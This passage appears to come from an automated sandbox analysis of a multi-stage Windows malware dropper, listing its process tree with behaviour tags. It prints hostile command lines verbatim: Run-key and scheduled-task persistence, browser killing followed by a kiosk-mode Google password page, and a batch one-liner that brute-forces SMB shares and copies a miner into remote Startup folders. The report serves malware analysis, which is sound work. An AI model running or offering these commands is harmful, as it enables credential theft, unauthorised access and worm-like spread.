C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:3160
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:6004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig"7⤵PID:6136
-
C:\Windows\system32\ipconfig.exeipconfig8⤵
- Gathers network information
PID:6820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig /all"7⤵PID:5928
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:6684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:4916
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:3852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:6532
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:6576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig"7⤵PID:6892
-
C:\Windows\system32\ipconfig.exeipconfig8⤵
- Gathers network information
PID:6508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig /all"7⤵PID:1480
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:6768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:2204
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:3324
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im brave.exe7⤵PID:5356
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2052
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im msedge.exe7⤵PID:6152
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im opera.exe7⤵PID:5168
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im vivaldi.exe7⤵PID:6224
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im yandex.exe7⤵PID:5308
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im chromium.exe7⤵
- Kills process with taskkill
PID:4368
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im epic.exe7⤵
- Kills process with taskkill
PID:6540
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im waterfox.exe7⤵PID:6940
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im palemoon.exe7⤵PID:3408
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im basilisk.exe7⤵
- Kills process with taskkill
PID:6176
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im iexplore.exe7⤵
- Kills process with taskkill
PID:6472
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im javaw.exe7⤵PID:6148
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im Minecraft.Windows.exe7⤵
- Kills process with taskkill
PID:5092
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im LeagueClient.exe7⤵
- Kills process with taskkill
PID:5548
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im VALORANT-Win64-Shipping.exe7⤵
- Kills process with taskkill
PID:6244
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe7⤵PID:5856
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im Steam.exe7⤵PID:5584
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im Growtopia.exe7⤵
- Kills process with taskkill
PID:2544
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im Battle.net.exe7⤵
- Kills process with taskkill
PID:656
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im UbisoftConnect.exe7⤵PID:5780
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im SocialClubHelper.exe7⤵PID:6580
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im GalaxyClient.exe7⤵
- Kills process with taskkill
PID:6564
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im EADesktop.exe7⤵
- Kills process with taskkill
PID:3148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:2020
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:5492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig"7⤵PID:6636
-
C:\Windows\system32\ipconfig.exeipconfig8⤵
- Gathers network information
PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig /all"7⤵PID:4948
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:4424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:5472
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:ProgramData\edge\Updater\Get-Clipboard.ps17⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:5004 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zaepsljq\zaepsljq.cmdline"8⤵PID:6688
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E0B.tmp" "c:\Users\Admin\AppData\Local\Temp\zaepsljq\CSC55DFA23B59034BC0A3D4D77E4BC12EF6.TMP"9⤵PID:2844
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009744001\99add6fb7b.exe"C:\Users\Admin\AppData\Local\Temp\1009744001\99add6fb7b.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6524
-
-
C:\Users\Admin\AppData\Local\Temp\1009745001\59b2d16d94.exe"C:\Users\Admin\AppData\Local\Temp\1009745001\59b2d16d94.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7132
-
-
C:\Users\Admin\AppData\Local\Temp\1009746001\22277f3eaa.exe"C:\Users\Admin\AppData\Local\Temp\1009746001\22277f3eaa.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7156 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
PID:5024
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2676
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
PID:5392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009747001\ae588fb112.exe"C:\Users\Admin\AppData\Local\Temp\1009747001\ae588fb112.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:6784
-
-
C:\Users\Admin\AppData\Local\Temp\1009748001\c04c9bc948.exe"C:\Users\Admin\AppData\Local\Temp\1009748001\c04c9bc948.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\1009749001\ecb5f9ca12.exe"C:\Users\Admin\AppData\Local\Temp\1009749001\ecb5f9ca12.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 6686⤵
- Program crash
PID:6644
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009750001\49be98400a.exe"C:\Users\Admin\AppData\Local\Temp\1009750001\49be98400a.exe"5⤵PID:4620
-
-
C:\Users\Admin\AppData\Local\Temp\1009751001\cf591713fa.exe"C:\Users\Admin\AppData\Local\Temp\1009751001\cf591713fa.exe"5⤵PID:4856
-
-
C:\Users\Admin\AppData\Local\Temp\1009752001\bb50426840.exe"C:\Users\Admin\AppData\Local\Temp\1009752001\bb50426840.exe"5⤵PID:5960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵PID:420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
PID:3324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵PID:8
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
PID:6284 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6304
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵PID:5288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:5772
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵PID:1564
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1900 -parentBuildID 20240401114208 -prefsHandle 1840 -prefMapHandle 1832 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50a3b815-bed4-4516-a850-c025c45480a8} 1564 "\\.\pipe\gecko-crash-server-pipe.1564" gpu8⤵PID:2240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2360 -parentBuildID 20240401114208 -prefsHandle 2336 -prefMapHandle 2332 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4ca910f-ab89-4f01-8931-3a0f354fb361} 1564 "\\.\pipe\gecko-crash-server-pipe.1564" socket8⤵PID:5440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2984 -childID 1 -isForBrowser -prefsHandle 2764 -prefMapHandle 2760 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da956fbf-817b-4844-9211-75461f1ad55e} 1564 "\\.\pipe\gecko-crash-server-pipe.1564" tab8⤵PID:2940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3244 -parentBuildID 20240401114208 -prefsHandle 3220 -prefMapHandle 3224 -prefsLen 24739 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a049ffe0-2f0b-4f61-b786-c99fdd8a3311} 1564 "\\.\pipe\gecko-crash-server-pipe.1564" gpu8⤵PID:1792
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
PID:6284
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009753001\798dfd43c8.exe"C:\Users\Admin\AppData\Local\Temp\1009753001\798dfd43c8.exe"5⤵PID:5136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\214554010.exeC:\Users\Admin\AppData\Local\Temp\214554010.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5036
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1252
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:2648
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3304426513.exeC:\Users\Admin\AppData\Local\Temp\3304426513.exe5⤵
- Executes dropped EXE
PID:7028 -
C:\Users\Admin\AppData\Local\Temp\1712017950.exeC:\Users\Admin\AppData\Local\Temp\1712017950.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:6172
-
-
-
C:\Users\Admin\AppData\Local\Temp\2290516451.exeC:\Users\Admin\AppData\Local\Temp\2290516451.exe5⤵
- Executes dropped EXE
PID:6300
-
-
C:\Users\Admin\AppData\Local\Temp\241228632.exeC:\Users\Admin\AppData\Local\Temp\241228632.exe5⤵
- Executes dropped EXE
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\1417232562.exeC:\Users\Admin\AppData\Local\Temp\1417232562.exe5⤵
- Executes dropped EXE
PID:6216 -
C:\Users\Admin\AppData\Local\Temp\1520828593.exeC:\Users\Admin\AppData\Local\Temp\1520828593.exe6⤵
- Executes dropped EXE
PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\848030742.exeC:\Users\Admin\AppData\Local\Temp\848030742.exe5⤵PID:6404
-
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe6⤵PID:7072
-
C:\Users\Admin\AppData\Local\Temp\342820975.exeC:\Users\Admin\AppData\Local\Temp\342820975.exe7⤵PID:5848
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:5388
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:3464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:1564
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2687416220.exeC:\Users\Admin\AppData\Local\Temp\2687416220.exe7⤵PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\280918401.exeC:\Users\Admin\AppData\Local\Temp\280918401.exe7⤵PID:6944
-
-
C:\Users\Admin\AppData\Local\Temp\1274633046.exeC:\Users\Admin\AppData\Local\Temp\1274633046.exe7⤵PID:760
-
-
C:\Users\Admin\AppData\Local\Temp\279624208.exeC:\Users\Admin\AppData\Local\Temp\279624208.exe7⤵PID:6836
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\windowshost.exe"C:\Users\Admin\AppData\Local\Temp\Files\windowshost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe"C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe"3⤵
- Executes dropped EXE
PID:4324 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "4⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.execlamer.exe -priverdD5⤵
- Executes dropped EXE
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1644
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ZharkBOT.exe"C:\Users\Admin\AppData\Local\Temp\Files\ZharkBOT.exe"3⤵
- Executes dropped EXE
PID:3100 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3100 -s 4604⤵
- Program crash
PID:872
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:568 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5092
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6400 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"3⤵
- Executes dropped EXE
PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe"C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6656 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Modifies system certificate store
PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\Files\IMG001.exe"3⤵
- Executes dropped EXE
PID:1920 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵PID:4572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- Kills process with taskkill
PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵
- Executes dropped EXE
PID:5020
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
PID:6832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:2052
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4952
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ5⤵PID:5656
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:6964
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0005⤵
- Power Settings
PID:5996 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 06⤵
- Power Settings
PID:4800
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 06⤵
- Power Settings
PID:5504
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0208& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
- NTFS ADS
PID:4180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
PID:1660 -
C:\Windows\SysWOW64\net.exenet view7⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:6748
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵PID:5224
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:1552
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:6296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "6⤵PID:5772
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.17⤵
- Discovers systems in the same network
PID:5256
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵
- System Location Discovery: System Language Discovery
PID:1008
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:2552
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:200
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6980
-
-
